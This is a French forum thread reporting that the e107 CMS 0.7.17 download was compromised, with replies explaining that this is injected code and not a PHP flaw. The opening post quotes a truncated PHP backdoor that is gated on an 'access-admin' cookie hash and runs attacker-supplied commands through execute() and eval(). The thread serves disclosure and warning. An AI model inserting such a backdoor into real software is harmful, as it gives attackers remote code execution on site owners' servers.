IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

  1. #1
    Expert éminent sénior
    Avatar de Katleen Erna
    Profil pro
    Inscrit en
    juillet 2009
    Messages
    1 547
    Détails du profil
    Informations personnelles :
    Localisation : France, Paris (Île de France)

    Informations forums :
    Inscription : juillet 2009
    Messages : 1 547
    Points : 75 991
    Points
    75 991
    Par défaut La dernière version du SGC e107 est backdoorée, son lien de téléchargement est compromis
    La dernière version du SGC e107 est backdoorée, son lien de téléchargement est compromis

    Certains d'entre vous utilisent peut être le système de gestion de contenu open source e107 pour créer ou gèrer des sites Internet. Disponible selon les termes de la licence GNU, ce SGC propose régulièrement de nouveaux téléchargements et mises à jour.

    Il semblerait que sa dernière version, la 0.7.17 (qui vient de sortir), contienne un PHP Backdoor.

    Un spécialiste en sécurité informatique ayant téléchargé le fichier a découvert l'entrée suivante à la ligne numéro 1876 de son code source :

    if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

    ...

    if(!empty($_POST['cmd'])){
    $out = execute($_POST['cmd']);
    }

    elseif(!empty($_POST['php'])){
    ob_start();
    eval($_POST['php']);
    $out = ob_get_contents();
    ob_end_clean();
    }
    (etc.)

    Le lien de téléchargement ne serait donc pas fiable. L'internaute a averti e107, et recommande de ne plus télécharger le fichier en l'attente de leur réponse au problème.

    Plus d'informations ici.

  2. #2
    Membre actif Avatar de supertonic
    Profil pro
    Inscrit en
    septembre 2003
    Messages
    191
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : septembre 2003
    Messages : 191
    Points : 263
    Points
    263
    Par défaut
    Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont également concernés ?

  3. #3
    Membre expérimenté
    Profil pro
    Inscrit en
    septembre 2009
    Messages
    1 285
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : septembre 2009
    Messages : 1 285
    Points : 1 331
    Points
    1 331
    Par défaut
    Citation Envoyé par supertonic Voir le message
    Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont également concernés ?
    Non

  4. #4
    Membre actif
    Profil pro
    azeazeae
    Inscrit en
    septembre 2002
    Messages
    114
    Détails du profil
    Informations personnelles :
    Localisation : France, Ille et Vilaine (Bretagne)

    Informations professionnelles :
    Activité : azeazeae

    Informations forums :
    Inscription : septembre 2002
    Messages : 114
    Points : 296
    Points
    296
    Par défaut
    Citation Envoyé par supertonic Voir le message
    Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont également concernés ?
    Oula...
    Non il s agit d un code inseré par une personne malveillante dans les sources du cms...

    Je l aime bien pourtant ce petit cms... Pas tres connu, je le pensais donc
    plus ou moins a l abri des objectifs des pirates.

  5. #5
    Rédacteur

    Avatar de khayyam90
    Homme Profil pro
    Chef de projet NTIC
    Inscrit en
    janvier 2004
    Messages
    10 383
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 36
    Localisation : France, Bas Rhin (Alsace)

    Informations professionnelles :
    Activité : Chef de projet NTIC
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : janvier 2004
    Messages : 10 383
    Points : 43 729
    Points
    43 729
    Par défaut
    La faille vient du code en téléchargement.
    Quiconque installe cette nouvelle version permettra à un attaquant bien informé (qui aura connaissance du cookie à nommer access-admin) d'exécuter directement du code système ou php sur son site.
    Une rapide recherche de base de données md5 ne m'a pas indiqué la valeur à positionner dans cookie.

    Grosse grosse faille de sécurité.

  6. #6
    Membre expérimenté
    Profil pro
    Inscrit en
    juillet 2005
    Messages
    662
    Détails du profil
    Informations personnelles :
    Localisation : Réunion

    Informations forums :
    Inscription : juillet 2005
    Messages : 662
    Points : 1 518
    Points
    1 518
    Par défaut
    il est sympas ce CMS mais il m'a pas l'air tres sécure...

    je l'avais installé il y a un moment déja et on me l'avait déja hacké à l'époque...

  7. #7
    Membre chevronné
    Profil pro
    Inscrit en
    janvier 2007
    Messages
    1 448
    Détails du profil
    Informations personnelles :
    Âge : 37
    Localisation : France, Paris (Île de France)

    Informations forums :
    Inscription : janvier 2007
    Messages : 1 448
    Points : 2 199
    Points
    2 199
    Par défaut
    Encore un bel exemple de propagation par les équipes de développement. Qui n'ont pas fait cela exprès.
    C'est juste un des mecs ou des serveurs d'hébergement qui s'est fait infecté involontairement et qui par rebond a contaminé son projet : /

    Donc le cms est toujours aussi secure (comme avant quoi pas plus, pas moins). et non, et triple non ce n'est pas une faille du moteur php, ou alors il faut bannir tous les langages de programmation.

    Fin, faut tout de même patcher sa release pour ceux qui ont upgradé, plus encore ceux qui sont en serveur dédié, ou autre rps / vps.

Discussions similaires

  1. Quelle est la dernière version compatible Java 1.5 ?
    Par verbose dans le forum Hibernate
    Réponses: 1
    Dernier message: 12/12/2012, 01h10
  2. Réponses: 13
    Dernier message: 25/09/2011, 20h59
  3. quelle est la derniére version de visual c++
    Par raimo dans le forum Windows
    Réponses: 3
    Dernier message: 27/02/2010, 21h25
  4. Quelle est la dernière version de JDIC ?
    Par julien1311 dans le forum API standards et tierces
    Réponses: 2
    Dernier message: 18/07/2007, 17h44
  5. Réponses: 2
    Dernier message: 11/05/2005, 16h12

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo